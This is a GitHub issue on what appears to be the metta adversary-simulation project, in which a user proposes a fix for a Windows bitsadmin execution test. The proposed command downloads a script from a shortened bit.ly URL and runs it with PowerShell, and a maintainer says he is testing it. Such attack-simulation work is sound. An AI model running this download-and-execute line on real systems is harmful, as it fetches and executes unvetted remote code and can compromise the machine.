Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix the execution_win_bitsadmin.yml #20

Closed
nuryslyrt opened this issue Jun 10, 2018 · 2 comments
Closed

Fix the execution_win_bitsadmin.yml #20

nuryslyrt opened this issue Jun 10, 2018 · 2 comments
Assignees

Comments

@nuryslyrt
Copy link

I tested the action in the metta/MITRE/Execution/execution_win_bitsadmin.yml on Win10, Win8, Win 7
You can change with this:

cmd.exe /c bitsadmin.exe /transfer mimi /Download /priority high http://bit.ly/2fMPgDz C:\Tools\Default_File_Path.ps1; cmd.exe /c powershell C:\Tools\Default_File_Path.ps1

Because current version is just working on Win8. Not working on Win10 and Win7.

@carnal0wnage carnal0wnage self-assigned this Jun 12, 2018
@carnal0wnage
Copy link
Contributor

thanks, taking a look/testing this

@carnal0wnage
Copy link
Contributor

4a15b79

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants